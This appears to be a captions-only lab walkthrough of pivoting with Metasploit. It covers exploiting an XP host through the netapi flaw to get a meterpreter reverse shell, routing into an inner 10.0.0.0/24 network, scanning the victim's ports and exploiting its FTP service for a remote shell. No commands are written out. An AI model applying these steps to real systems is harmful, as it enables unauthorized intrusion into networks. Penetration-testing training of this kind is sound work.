METASPLOIT - PIVOTING
- Layout for this exercise:
- First, let's exploit the pivot XP taking advantage of the netapi vulnerability:
- Setting the remote host to the XP's IP address:
- Looking for a meterpreter session and a reverse_tcp shell:
- The local host is the attacker itself, due to the reverse shell:
- Once launched the exploit, the attack is successful and a meterpreter session is achieved:
- The pivot has got two interfaces, one with the outside network 192.168.1.0 and the other with inside network 10.0.0.0:
- Let's discover hosts inside the inside network 10.0.0.0/24. Because 10.0.0.1 corresponds to the pivot XP, the 10.0.0.2 must belong to the innermost machine, the vitcim:
- Backgrounding the meterpreter session 1:
- So far, there is only one active meterpreter, number 1:
- A route is added to the inside network, using the active meterpreter session 1:
- Printing the route:
- Backing from the netapi exploit:
- Scanning open ports (just from 1 to 500) at the victim 10.0.0.2:
- Several interesting ports are open, for instance TCP 21, usually dedicated to FTP service:
- Backing from the auxiliary script:
- Now, let's try attacking the FTP service on the victim:
- Setting the victim's IP as the remote host:
- Let's use the payload cmd/unix/interact to get a remote shell:
- Required options:
- Once the exploit is run the attack is successful because the remote shell is finally achieved, back from the victim's machine:
